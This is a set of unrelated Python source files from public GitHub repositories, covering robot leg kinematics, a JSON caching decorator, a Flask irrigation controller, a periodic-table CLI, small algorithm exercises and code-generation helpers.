t_leg = leg_thetas(leg, x, y, z, **kwargs)\n return cls(leg, x, y, z, t_hip, t_femur, t_leg, timestamp=timestamp)\n\n @classmethod\n def from_thetas(\n cls,\n leg: Leg,\n hip_theta: float,\n femur_theta: float,\n leg_theta: float,\n *,\n timestamp: Optional[datetime] = None,\n **kwargs: Any,\n ) -> \"LegState\":\n \"\"\"Creates a new LegState from the given servo angles.\n\n Parameters\n ----------\n leg : Leg\n The leg to create the new state object for.\n hip_theta : float\n The Hip-angle of the leg to create the new state for.\n femur_theta : float\n The Femur-angle of the leg to create the new state for.\n leg_theta : float\n The Leg-angle of the leg to create the new state for.\n timestamp : datetime, optional\n The timestamp to use for the new state, if any.\n **kwargs : optional\n Additional keyword arguments to pass to the :obj:`foot_xyz`\n function.\n\n Returns\n -------\n LegState\n The leg state requested, initialized from the given leg\n servo angles.\n\n \"\"\"\n x, y, z = foot_xyz(leg, hip_theta, femur_theta, leg_theta, **kwargs)\n return cls(\n leg,\n x,\n y,\n z,\n hip_theta,\n femur_theta,\n leg_theta,\n timestamp=timestamp,\n )\n\n\nclass LegStates(Sequence[T_LegState], BaseState):\n \"\"\"\n Composite state/wrapper for holding :obj:`LegState` objects.\n \"\"\"\n\n __slots__ = 
(\"_legs\",)\n\n def __init__(self, *leg_states: T_LegState, **kwargs: Any) -> None:\n self._legs: List[T_LegState] = sorted(leg_states, key=lambda x: x.leg)\n if len(self._legs) != 4:\n raise StateError(\n \"Invalid number of leg states given (requires 4), got:\"\n f\" {len(self._legs)}\"\n )\n elif not all(x.leg == (i + 1) for i, x in enumerate(self._legs)):\n raise StateError(\"Not all legs represented in leg states given\")\n\n if \"timestamp\" not in kwargs or kwargs[\"timestamp\"] is None:\n kwargs[\"timestamp\"] = max(x.timestamp for x in self._legs)\n super().__init__(**kwargs)\n\n @property\n def fl(self) -> T_LegState:\n \"\"\"LegState: State of the front-left leg.\"\"\"\n return self._legs[Leg.FL - 1]\n\n @property\n def fr(self) -> T_LegState:\n \"\"\"LegState: State of the front-right leg.\"\"\"\n return self._legs[Leg.FR - 1]\n\n @property\n def bl(self) -> T_LegState:\n \"\"\"LegState: State of the back-left leg.\"\"\"\n return self._legs[Leg.BL - 1]\n\n @property\n def br(self) -> T_LegState:\n \"\"\"LegState: State of the back-right leg.\"\"\"\n return self._legs[Leg.BR - 1]\n\n def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n s_args, s_kws = super().__str_args__()\n _ = (s_args.append(x) for x in self._legs)\n return s_args, s_kws\n\n def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n r_args, r_kws = super().__repr_args__()\n _ = (r_args.append(x) for x in self._legs)\n return r_args, r_kws\n\n def __iter__(self) -> Iterator[T_LegState]:\n return iter(self._legs)\n\n def __len__(self) -> int:\n return len(self._legs)\n\n def __getitem__(self, leg: Union[int, Leg]) -> T_LegState:\n if isinstance(leg, Leg):\n l_idx = leg.value - 1\n else:\n l_idx = leg\n return self._legs[l_idx]\n\n def __getstate__(self) -> Dict[str, Any]:\n state = super().__getstate__()\n state[\"legs\"] = [x.__getstate__() for x in self._legs]\n return state\n\n def __setstate__(self, state: Dict[str, Any]) -> None:\n legs: List[Dict[str, Any]] = state.pop(\"legs\")\n state[\"legs\"] = [LegState.from_dict(x) for x in legs]\n return super().__setstate__(state)\n\n def distance(self, other: \"LegStates\") -> float:\n super().distance(other)\n ret = 0.0\n for i, v in enumerate(self._legs):\n ret += v.distance(other._legs[i])\n return ret / len(self._legs)\n\n\nclass RobotState(BaseState):\n \"\"\"\n Overall kinematic state data storage for the robot.\n \"\"\"\n\n __slots__ = (\n \"_x\",\n \"_y\",\n \"_z\",\n \"_roll\",\n \"_pitch\",\n \"_yaw\",\n \"_leg_states\",\n \"_body\",\n )\n\n def __init__(\n self,\n x: float,\n y: float,\n z: float,\n roll: float,\n pitch: float,\n yaw: float,\n legs: Sequence[LegState],\n *,\n body_params: Optional[BodyParameters] = None,\n **kwargs: Any,\n ) -> None:\n if body_params is None:\n self._body = BodyParameters(**kwargs)\n else:\n self._body = body_params\n super().__init__(**kwargs)\n self._x = x\n self._y = y\n self._z = z\n self._roll = roll\n self._pitch = pitch\n self._yaw = yaw\n self._leg_states = LegStates(*legs)\n\n @property\n def x(self) -> float:\n \"\"\"float: The current X-coordinate of the body.\"\"\"\n return self._x\n\n @property\n def y(self) -> float:\n \"\"\"float: The current Y-coordinate of the body.\"\"\"\n return self._y\n\n @property\n def z(self) -> float:\n \"\"\"float: The current Z-coordinate of the body.\"\"\"\n return self._z\n\n @property\n def roll(self) -> float:\n \"\"\"float: The current Roll-angle of the body.\"\"\"\n return self._roll\n\n @property\n def pitch(self) -> float:\n \"\"\"float: The current 
Pitch-angle of the body.\"\"\"\n        return self._pitch\n\n    @property\n    def yaw(self) -> float:\n        \"\"\"float: The current Yaw-angle of the body.\"\"\"\n        return self._yaw\n\n    @property\n    def legs(self) -> LegStates[LegState]:\n        \"\"\"LegStates[LegState]: The state of each leg.\"\"\"\n        return self._leg_states\n\n    @property\n    def body(self) -> BodyParameters:\n        \"\"\"BodyParameters: The related body parameters for this state.\"\"\"\n        return self._body\n\n    def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n        s_args, s_kws = super().__str_args__()\n        s_kws[\"x\"] = self._x\n        s_kws[\"y\"] = self._y\n        s_kws[\"z\"] = self._z\n        s_kws[\"roll\"] = self._roll\n        s_kws[\"pitch\"] = self._pitch\n        s_kws[\"yaw\"] = self._yaw\n        return s_args, s_kws\n\n    def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n        r_args, r_kws = super().__repr_args__()\n        r_args.append(self._x)\n        r_args.append(self._y)\n        r_args.append(self._z)\n        r_args.append(self._roll)\n        r_args.append(self._pitch)\n        r_args.append(self._yaw)\n        r_args.append(tuple(self._leg_states))\n        return r_args, r_kws\n\n    def __getstate__(self) -> Dict[str, Any]:\n        state = super().__getstate__()\n        state[\"legs\"] = self._leg_states.__getstate__()\n        state[\"body\"] = self._body.__getstate__()\n        return state\n\n    def __setstate__(self, state: Dict[str, Any]) -> None:\n        state[\"legs\"] = LegStates.from_dict(state.pop(\"legs\"))\n        state[\"body\"] = BodyParameters.from_dict(state.pop(\"body\"))\n        return super().__setstate__(state)\n\n    def distance(self, other: \"RobotState\") -> float:\n        super().distance(other)\n        return (\n            ((self._x - other._x) ** 2)\n            + ((self._y - other._y) ** 2)\n            + ((self._z - other._z) ** 2)\n            + ((self._roll - other._roll) ** 2)\n            + ((self._pitch - other._pitch) ** 2)\n            + ((self._yaw - other._yaw) ** 2)\n        ) ** 0.5\n\n    def pos_distance(self, other: \"RobotState\") -> float:\n        \"\"\"The distance between the positions of two states.\"\"\"\n        super().distance(other)\n        return (\n            ((self._x - other._x) ** 2)\n            + ((self._y - other._y) ** 2)\n            + ((self._z - other._z) ** 2)\n        ) ** 0.5\n\n    def orn_distance(self, other: \"RobotState\") -> float:\n        \"\"\"The distance between the orientations of two states.\"\"\"\n        super().distance(other)\n        return (\n            ((self._roll - other._roll) ** 2)\n            + ((self._pitch - other._pitch) ** 2)\n            + ((self._yaw - other._yaw) ** 2)\n        ) ** 0.5\n","repo_name":"douglasdaly/squad-robot","sub_path":"src/squad/motion/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":14415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72258336400","text":"# Decorator implemented as a plain function\r\ndef persists(file_path:str,option:str,step:int=1,jm=False):\r\n    \"\"\"\r\n    File persistence decorator.\r\n    :param file_path: path of the storage file\r\n    :param option: operation: set,getset,get,incr,decr,keys,del\r\n    :param step: step size\r\n    :param jm: whether to hash the key\r\n    :return: mixed\r\n    \"\"\"\r\n    def decorator(original_func):\r\n        def new_func(param='',value=''):\r\n            import json\r\n            try:\r\n                cache = json.load(open(file_path, 'r'))\r\n            except (IOError, ValueError):\r\n                cache = {}\r\n            # resolve the key\r\n            import hashlib\r\n            key = str(param)\r\n            if(type(param).__name__ == 'int' and jm==True):\r\n                key = hashlib.new('md5', str(param*65535).encode('utf-8')).hexdigest()\r\n            if(type(param).__name__ == 'str' and jm==True):\r\n                key = hashlib.new('md5', ('cache_'+param).encode('utf-8')).hexdigest()\r\n            \"\"\"\r\n            Select the matching operation according to option\r\n            \"\"\"\r\n            if(param =='' and option == 'keys'):\r\n                return cache\r\n            if(option == 'set'): # store directly\r\n                cache_key = original_func(param,value) 
# run to get the new value\r\n                cache[key] = cache_key # store the new value\r\n            if(option == 'getset'):# get first, then store\r\n                if key in cache:\r\n                    cache_key = cache[key] # get the old value\r\n                else:\r\n                    cache_key = None\r\n                cache[key] = original_func(param,value) # store the new value\r\n            if(option == 'get'):# just fetch it if present, without storing\r\n                if key in cache:\r\n                    cache_key = cache[key]\r\n                else:\r\n                    cache_key = None\r\n            if(option == 'incr'):\r\n                if key in cache:\r\n                    cache_key = cache[key]+step\r\n                else:\r\n                    cache_key = step\r\n                cache[key] = cache_key # store the new value\r\n            if(option == 'decr'):\r\n                if key in cache:\r\n                    cache_key = cache[key]-step\r\n                else:\r\n                    cache_key = -step\r\n                cache[key] = cache_key # store the new value\r\n\r\n            if(option == 'del'):\r\n                if key in cache:\r\n                    cache_key = cache[key]\r\n                    del cache[key]\r\n                else:\r\n                    cache_key = None\r\n            with open(file_path, 'w') as f:\r\n                json.dump(cache, f, indent=4)\r\n            return cache_key\r\n        return new_func\r\n    return decorator\r\n\r\n# Decorator implemented as a class\r\nimport json\r\nimport random\r\nfrom functools import partial\r\nfile = \"cache.file\"\r\nclass inner(object):\r\n    def __init__(self, persist, callfunc):\r\n        self.persist = persist\r\n        self.callfunc = callfunc\r\n\r\n    def __read(self):\r\n        try:\r\n            return json.load(open(self.persist.file_path, 'r'))\r\n        except (IOError, ValueError):\r\n            return {}\r\n\r\n    def __write(self, cache):\r\n        with open(self.persist.file_path, \"w\") as f:\r\n            json.dump(cache, f, indent=4)\r\n\r\n    def set(self, cache, params):\r\n        cache_key = self.callfunc(params)  # run to get the new value\r\n        cache[params] = cache_key\r\n        return cache_key\r\n\r\n    def get(self, cache, params):\r\n        return cache.get(params)\r\n\r\n    def getset(self, cache, params):\r\n        cache[params] = self.callfunc(params)\r\n        return cache.get(params)\r\n\r\n    def incr(self, cache, params):\r\n        cache_key = cache.get(params, 0) + self.persist.step\r\n        cache[params] = cache_key  # store the new value\r\n        return cache_key\r\n\r\n    def decr(self, cache, params):\r\n        cache_key = cache.get(params, 0) - self.persist.step\r\n        cache[params] = cache_key  # store the new value\r\n        return cache_key\r\n\r\n    def default(self, cache, params):\r\n        return self.callfunc(params)\r\n\r\n    def __call__(self, params):\r\n        cache = self.__read()\r\n        if hasattr(self, self.persist.option):\r\n            result = partial(getattr(self, self.persist.option), cache)(params)\r\n        else:\r\n            result = partial(self.default, cache)(params)\r\n        self.__write(cache)\r\n        return result\r\n\r\nclass persist(object):\r\n    def __init__(self, file_path, option, step=1):\r\n        self.file_path = file_path\r\n        self.option = option\r\n        self.step = step\r\n\r\n    def __call__(self, func):\r\n        return inner(self, func)\r\n\r\n\r\n@persist(file, 'get')\r\ndef test(key):\r\n    return 'get'\r\n@persist(file, 'getset')\r\ndef test1(key):\r\n    return 'getset'\r\n@persist(file, 'incr', 5)\r\ndef test2(key):\r\n    return 10\r\n@persist(file, 'set')\r\ndef test3(key):\r\n    return {'a': 1, 'b': 2}\r\n@persist(file, 'getset')\r\ndef test4(key):\r\n    r = [1, 2, 3, 4, 5, 5, key]\r\n    random.shuffle(r)\r\n    return r\r\n@persist(file, 'decr', 11)\r\ndef test5(key):\r\n    return -10\r\n","repo_name":"Euraxluo/ProjectPractice","sub_path":"python/Mytodolist/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37907854558","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis is a layer that links to another layer\n\"\"\"\nfrom smartimage.layer import *\nfrom smartimage.errors import SmartimageError\n\n\nclass Link(Layer):\n    \"\"\"\n    This is a layer that links to another layer\n    \"\"\"\n\n    def 
__init__(self,parent:Layer,xml:str):\n        self._target=None\n        Layer.__init__(self,parent,xml)\n\n    @property\n    def ref(self)->str:\n        \"\"\"\n        get the reference\n        \"\"\"\n        return self.xml.attrib['ref']\n    @ref.setter\n    def ref(self,ref):\n        \"\"\"\n        set the reference\n        \"\"\"\n        self.xml.attrib['ref']=ref\n        self.root.dirty=True\n\n    def _getProperty(self,name:str,default=None):\n        \"\"\"\n        override _getProperty so that when somebody uses this object\n        they get the property of the one it is linked to instead\n        \"\"\"\n        val=default\n        if name in self.xml.attrib:\n            val=self.xml.attrib[name]\n        elif name not in ['name','elementId']: # can't be unique to this object\n            val=self.target._getProperty(name,default)\n        return val\n\n    @property\n    def target(self)->Layer:\n        \"\"\"\n        the target to link to\n        \"\"\"\n        if self._target is None:\n            layerId=self.ref.split('.',1)[0]\n            self._target=self.getLayer(layerId)\n            if self._target is None:\n                raise SmartimageError(self,'ERR: broken link to layer %s'%layerId)\n        return self._target\n\n    @property\n    def image(self)->Union[PilPlusImage,None]:\n        \"\"\"\n        get the image for this layer\n        \"\"\"\n        img=self.target.image\n\n        w=self._getProperty('w','auto')\n        h=self._getProperty('h','auto')\n        if (w not in ['0','auto']) or (h not in ['0','auto']):\n            if w in ['0','auto']:\n                w=int(h)*img.width/img.height\n            elif h in ['0','auto']:\n                h=int(w)*img.height/img.width\n            img=img.resize((int(w),int(h)),img.ANTIALIAS)\n        img.immutable=True # mark this image so that compositor will not alter it\n        return img","repo_name":"TheHeadlessSourceMan/smartimage","sub_path":"link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"6751211930","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\n\n\ndef main():\n    accelerometerDataFile = \"accelerometer_data_5min.csv\"\n    readAccelerometerData = pd.read_csv(accelerometerDataFile, sep=\";\")\n    x = readAccelerometerData.values[:, 1][1:]\n    y = readAccelerometerData.values[:, 2][1:]\n    z = readAccelerometerData.values[:, 3][1:]\n    time = readAccelerometerData.values[:, 0][1:]\n    start = time[0]\n    end = time[len(time) - 1]\n    size = int((end-start)/1000) + 1\n    step = size/len(x)\n    seconds = [i for i in np.arange(1, size + 1, step)]\n\n    fig, (ax0, ax1, ax2) = plt.subplots(3, 1)\n\n    ax0.plot(seconds, x, 'b', linewidth=0.5)\n    ax0.legend(\"x\")\n    ax0.set_title(\"Readings of a smartphone accelerometer \\n lying on a table for five minutes\")\n\n    ax1.plot(seconds, y, 'g', linewidth=0.5)\n    ax1.legend(\"y\")\n    ax1.set_ylabel(\"Acceleration\", fontsize=12, color='black')\n\n    ax2.plot(seconds, z, 'r', linewidth=0.5)\n    ax2.legend(\"z\")\n\n    plt.xlabel('Seconds', fontsize=12)\n    plt.show()\n\n    print(sum([np.sqrt(x[i]**2 + y[i]**2 + z[i]**2) for i in range(len(x))])/len(x))\n\n\n\nmain()","repo_name":"fotievaRi/Diplom","sub_path":"AccelerometerData_5min.py","file_name":"AccelerometerData_5min.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43798793153","text":"# 31256 KB / 40 ms\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nm = int(input())\nrec = list(map(int, input().split()))\nvote = {} # number of a student whose photo is posted: vote count\nseq = [] # order in which the photos were posted\n\nfor i in range(m):\n    # if the student's photo is already posted, just add 1\n    if rec[i] in vote:\n        vote[rec[i]] += 1\n\n    # if the student's photo is not posted yet\n    else:\n        # if all the photo frames are full, remove the student with the fewest votes\n        if len(vote) == n:\n            min_vote = 
min(vote.values())\n            for j in range(len(seq)):\n                if vote[seq[j]] == min_vote:\n                    vote.pop(seq[j])\n                    seq.pop(j)\n                    break\n        # after the removal, post the new student\n        vote[rec[i]] = 1\n        seq.append(rec[i])\n\nprint(*sorted(vote.keys()))","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week14_230413/1713_후보_추천하기/1713_최수현.py","file_name":"1713_최수현.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18949240359","text":"from flask import Flask, request\nfrom flask import render_template, json\nfrom flask_cors import CORS\nfrom decisionController import DecisionController\nfrom UserInterface import UserInterface\nfrom controller import dripController\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef hello():\n    return render_template('index.html')\n\n@app.route('/getActuatorStatus', methods=['POST'])\ndef getActuatorStatus():\n    data = request.json\n    d = DecisionController('start')\n    d.setBufferData(data)\n    res = d.compareConfigurationValues()\n    print(res)\n    return res\n\n@app.route('/getFarmConfiguration', methods=['GET'])\ndef getFarmConfiguration():\n    return u.getFarmConfigurationValues()\n\n@app.route('/saveFarmConfigurationDetails', methods=['POST'])\ndef saveFarmConfigurationDetails():\n    data = request.json\n    return u.setFarmData(data)\n\n@app.route('/farmConfiguration')\ndef farmConfiguration():\n    return render_template('farm_config.html')\n\ndef chunker_list(seq, size):\n    return (seq[i::size] for i in range(size))\n\n@app.route('/getSensorValues', methods=['GET'])\ndef getSensorValues():\n    res = []\n    cntr = request.args.get('cntr')\n    reset = request.args.get('isReset')\n    print(reset)\n    for i in range(0, len(controllers)):\n        res.append(\n            { 'val': controllers[i].readSensorValue(int(cntr), reset) }\n        )\n    print(list(chunker_list(res, 4)))\n    res = list(chunker_list(res, 4))\n    return json.dumps(res)\nif __name__ == '__main__':\n    u = UserInterface()\n    controllers = []\n    for i in range(1, 9):\n        controllers.append(dripController(i))\n    app.run(debug=True, port=80, host='0.0.0.0')","repo_name":"pshubham95/SD-Final-Project","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15957021394","text":"import random\nfrom collections import Counter\n\ntot = []\n# tot2 = []\n\n# pop() was too slow, so numbers are just drawn with random...\nfor x in range(8140000):\n# for x in range(1000):\n# for x in range(2) :\n    num = []\n    rotto_no = random.randint(1,45)\n    for si in range(6):\n    # for i in range(7):\n        while rotto_no in num:\n            rotto_no = random.randint(1,45)\n        num.append(rotto_no)\n        # if i == 6 :\n        #     tot2.append(rotto_no)\n        # else :\n        #     tot.append(rotto_no)\n        tot.append(rotto_no)\n    #print(sorted(num))\n    #print(tot)\ntotCnt = Counter(tot)\n# tot2Cnt = Counter(tot2)\n# print(totCnt)\n\n# totVal = sorted(totCnt.most_common(7))\ntotVal = sorted(totCnt.most_common(6))\n# print(totVal)\n# tot2Val = (tot2Cnt.most_common(1))\n# print(tot2Val)\n# print(sorted(totVal))\n# print(totVal)\n\nreturnVal = []\n\nfor ret in range(6) :\n    returnVal.append(str(totVal[ret])[1:str(totVal[ret]).find(',')])\n\nf = open('./roResult.txt', 'r')\n\nresultList = []\n\nwhile True:\n    line = f.readline()\n    if len(line) > 0 : resultList.append(line[0:line.find('+')])\n    if not line: break\n\nf.close()\n\nuseFlag = True\nfor re in range(len(resultList)):\n    # print(','.join(returnVal))\n    # print(resultList[re])\n    if 
','.join(returnVal) == resultList[re] : \n        useFlag = False \n        useNum = re+1\n\nif useFlag == False : print(str(useNum) +' : these numbers match a past winning draw.')\nelse : print(str(returnVal) + ' : these numbers are not in the past winning results.')\n\n\n# print(returnVal)\n# print(sorted(returnVal))","repo_name":"noname23Dean/pyDean","sub_path":"01randomNum.py","file_name":"01randomNum.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74035438480","text":"import csv\r\nimport os \r\n\r\ntabela_periodica = {}\r\nestados = {'l': 'Liquid', 'g': 'Gaseous', 's':'Solid', 'd':'Unknown'} ## example of a dictionary\r\n\r\ndef limparTela():\r\n    os.system('cls')\r\n\r\narquivo = csv.reader(open('tabela.csv'), delimiter=';')\r\nfor i,dado_linha in enumerate(arquivo):\r\n    if i == 0: # skip the first line of the file\r\n        continue\r\n\r\n    dados = {}\r\n    dados['simbolo'] = dado_linha[0] # symbol\r\n    dados['nome'] = dado_linha[1] # name\r\n    dados['atomico'] = dado_linha[2] # atomic number\r\n    dados['linha'] = dado_linha[3] # row\r\n    dados['coluna'] = dado_linha[4] # column\r\n    dados['estado'] = dado_linha[5] # state\r\n\r\n    \r\n    # insert the data into the periodic table\r\n    tabela_periodica[dados['simbolo']] = dados\r\n\r\nwhile True:\r\n    print(\"Periodic Table\\n\")\r\n    print(\"Choose one of the options:\")\r\n    print(\"1 -> Existing data\")\r\n    print(\"2 -> Existing characteristics\")\r\n    print(\"3 -> Characteristics of an element\")\r\n    print(\"4 -> Quit\")\r\n\r\n    option = str(input())\r\n    limparTela()\r\n\r\n    if option == '1':\r\n        \r\n        print(\"\\nElements in the database:\")\r\n        for name in tabela_periodica.keys():\r\n            print(\"-> \"+ name)\r\n        print()\r\n        \r\n    elif option == '2':\r\n        print(\"\\nCharacteristics in the database:\")\r\n        for name in tabela_periodica['Ti'].keys():\r\n            print(\"-> \"+name)\r\n        print()\r\n\r\n    elif option == '3':\r\n        \r\n        elemento = input('\\nEnter the symbol of the element to see its characteristics: ')\r\n        if elemento in tabela_periodica:\r\n            carac = input(\"\\nEnter which characteristic you want to see: \")\r\n            while carac not in tabela_periodica[elemento]:\r\n                print(\"Characteristic \" + carac + \" not found in the database\")\r\n                carac = input(\"\\nEnter which characteristic you want to see: \")\r\n            print()\r\n            print(tabela_periodica[elemento][carac])\r\n            print()\r\n        else:\r\n            print(\"Element \" + elemento + \" not found in the database\")\r\n\r\n    elif option == '4':\r\n        break\r\n\r\n","repo_name":"gabrielvanz/CC-Estrutura-de-Dados","sub_path":"Atividade 1 - Usando a estrutura de dados dicionário/dicionario.py","file_name":"dicionario.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8759025242","text":"import enum\nimport re\nfrom typing import Optional\n\nfrom github.ContentFile import ContentFile\nfrom packaging.specifiers import SpecifierSet\n\nPYTHON_REQUIRES_PATTERN = re.compile(\n    r\"python_requires\\s*=\\s*(\\(?(\\s*['\\\"].+?['\\\"]\\s*)+\\)?)\", re.DOTALL\n)\n\n\nclass PyVersion(enum.Enum):\n    PY2 = \"PY2\"\n    PY3 = \"PY3\"\n    PY2PY3 = \"PY2PY3\"\n\n\nDEFAULT_PY_VERSION = PyVersion.PY2\n\n\ndef get_python_requires_str(setup_content: str) -> Optional[str]:\n    try:\n        output = PYTHON_REQUIRES_PATTERN.search(setup_content).group(1)\n        python_requires = re.sub(r\"[()\\s'\\\"]\", \"\", output)\n    except AttributeError:\n        python_requires = None\n    return python_requires\n\n\ndef 
get_package_python_version(setup_content: str) -> PyVersion:\n python_requires = get_python_requires_str(setup_content)\n if not python_requires:\n return DEFAULT_PY_VERSION\n\n py2_set = {\"2.7\"}\n py3_set = {\"3.7\", \"3.8\", \"3.9\", \"3.10\"}\n specifier = SpecifierSet(python_requires)\n is_py2 = set(specifier.filter(py2_set))\n is_py3 = set(specifier.filter(py3_set))\n\n if is_py2 and is_py3:\n return PyVersion.PY2PY3\n elif is_py2:\n return PyVersion.PY2\n elif is_py3:\n return PyVersion.PY3\n else:\n return DEFAULT_PY_VERSION\n\n\ndef get_str_from_git_content(content: \"ContentFile\") -> str:\n return content.decoded_content.decode(\"utf-8\")\n","repo_name":"QualiSystems/Shell-Explorer","sub_path":"scripts/shell_explorer/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74362525841","text":"def calPoint(ops) -> int:\n scores = []\n sum = 0\n\n log(\"0) initilize\")\n\n for idx, x in enumerate(ops):\n\n x = x.upper().strip()\n score_count = len(scores)\n\n flagSkip = True\n\n if int_tryparse(x): # x.isdigit():\n flagSkip = False\n scores.append(int(x))\n log(f\"{idx+1}) add {x} .. {scores}\")\n elif x == '+':\n if score_count >= 2:\n flagSkip = False\n sum = int(scores[-1])+int(scores[-2])\n scores.append(sum)\n\n log(f\"{idx+1}) add sum of last 2 scores .. {scores}\")\n elif x == 'D':\n if score_count >= 1:\n flagSkip = False\n sum = int(scores[-1]) * 2\n scores.append(sum)\n log(f\"{idx+1}) add double of last score .. {scores}\")\n elif x == 'C':\n if score_count >= 1:\n flagSkip = False\n scores.pop(score_count-1)\n log(f\"{idx+1}) remove last score .. {scores}\")\n else:\n pass\n\n if flagSkip:\n log(f\"{idx+1}) ignore and skip for '{x}'\")\n sum = 0\n for x in scores:\n sum += int(x)\n\n log(f\"\\nraw score is {ops}\", True)\n log(f\"total score of {scores} is {sum}\", True)\n\n return sum\n\n\ndef int_tryparse(value):\n ret = False\n try:\n i = int(value)\n ret = True\n except:\n i = -1\n\n return ret\n\n\ndef log(msg, debugMode=True):\n if debugMode:\n print(msg)\n\n\nif __name__ == \"__main__\":\n line = \"+ 5 -2 4 zz c d 9 + +\"\n ops = line.strip().split()\n calPoint(ops)\n # print(calPoint(ops))\n","repo_name":"ssuwijak/python_turing_exam","sub_path":"turing_exam1.py","file_name":"turing_exam1.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30116907008","text":"import logging\nfrom typing import List, TypeVar, Generic\nfrom app.core.util import Comparable\nfrom . import Trigger\nfrom app.core.event_engine.events import Event\nfrom app.core.event_engine.triggers import Trigger, ValueTriggerSchema\nfrom app.core.event_engine.actions import Action\n\nfrom marshmallow import post_load\n\n#######################\n# Schemas\n#######################\nclass GreaterThanTriggerSchema(ValueTriggerSchema):\n\t@post_load\n\tdef make(self, data, **kwargs):\n\t\treturn GreaterThanTrigger(**data)\n#######################\n\nT = TypeVar('T', bound=Comparable)\nclass GreaterThanTrigger(Trigger, Generic[T]):\n\t__schema__ = GreaterThanTriggerSchema\n\n\t\"\"\"Executes if value is greater than trigger value\"\"\"\n\tdef __init__(self, value: T, actions: List[Action] = [], *, field: str | None = None) -> None:\n\t\t\"\"\"\n\t\tArgs:\n\t\t\t\tvalue (T): Value to test against\n\t\t\t\tactions (List[Action], optional): Actions to execute on success. 
Defaults to [].\n\t\t\t\tfield (str | None, optional): Field to use when testing trigger value. Defaults to None.\n\t\t\"\"\"\n\t\tsuper().__init__(actions, field)\n\t\tself.value = value\n\n\tdef execute(self, v: T | dict, event: Event) -> bool:\n\t\tlogging.info('Executing greater than trigger')\n\t\tvalue: T = self.get_value(v)\n\n\t\tif not value > self.value :\n\t\t\tlogging.info(f'{value} < {self.value}, not executing actions')\n\t\t\treturn False\n\n\t\tlogging.info(f'{value} > {self.value}, executing actions')\n\t\tself.execute_actions(event)\n\n\t\treturn True\n","repo_name":"Flourish-IoT/Flourish-API","sub_path":"src/app/core/event_engine/triggers/greater_than.py","file_name":"greater_than.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20565922201","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom enum import Enum\nfrom io import StringIO\nfrom delia_commons.singleton import Singleton\n\nlogger = logging.getLogger('delia.codegen')\n\n\nclass AutoNumber(Enum):\n def __new__(cls):\n value = len(cls.__members__) + 1\n obj = object.__new__(cls)\n obj._value_ = value\n return obj\n\n\nclass CodeBlockNames(AutoNumber):\n ROOT = ()\n HEADER = ()\n NS = ()\n BODY = ()\n WRAPPING = ()\n\n RECEIVING_PARAMS_VALIDITY = ()\n\n METADATA = ()\n\n LITERAL = ()\n LOCAL = ()\n CONSTANT = ()\n CONSTANT_NS = ()\n\n ARRAY = ()\n FIELD = ()\n DATA_DESC = ()\n\n REPORT_DECLARATION = ()\n REPORT_INSTANCE = ()\n\n CONTROL = ()\n\n FRAME = ()\n RELATION = ()\n SOURCE = ()\n\n FLI = ()\n FUNCTION = ()\n FUNCTION_NS = ()\n FUNCTION_KEYS = ()\n FUNCTION_KEYS_DICT = ()\n\n RELATION_LOCAL = ()\n INSERT = ()\n ALTER = ()\n DELETE = ()\n DELETE_VIA_KEY = ()\n SELECT = ()\n SELECT_JOIN = ()\n SELECT_VIA_KEY = ()\n FOR_EACH = ()\n FOR_EACH_JOIN = ()\n\n\nclass Token(Singleton):\n pass\n\n\nclass Indent(Token):\n pass\n\n\nclass Dedent(Token):\n pass\n\n\nclass Newline:\n def __init__(self, locations):\n self.locations = locations\n\n\nclass Locations(Token):\n locations = None\n\n def set_locations(self, locations):\n self.locations = locations\n\n def __repr__(self):\n return str(self.locations)\n\n\nclass CodeBlock:\n\n def __init__(self, tab=4 * \" \"):\n self.code = []\n self.tab = tab\n self._gen_location = True\n\n def stop_gen_locations(self):\n self._gen_location = False\n\n def start_gen_locations(self):\n self._gen_location = True\n Locations().locations = None\n\n def newline(self, string=\"\", no_locations=False):\n if no_locations or not self._gen_location or string.lstrip().startswith('#'):\n locations = None\n else:\n locations = Locations().locations\n\n self.code.append(Newline(locations))\n self.code.append(string)\n\n def write(self, string):\n self.code += string\n\n def indent(self):\n self.code.append(Indent())\n\n def dedent(self):\n self.code.append(Dedent())\n\n def add(self, cb):\n self.code.append(cb)\n\n def set_locations(self, locations):\n pass\n\n def flatten(self, level=0, buffer=None, newline=False):\n 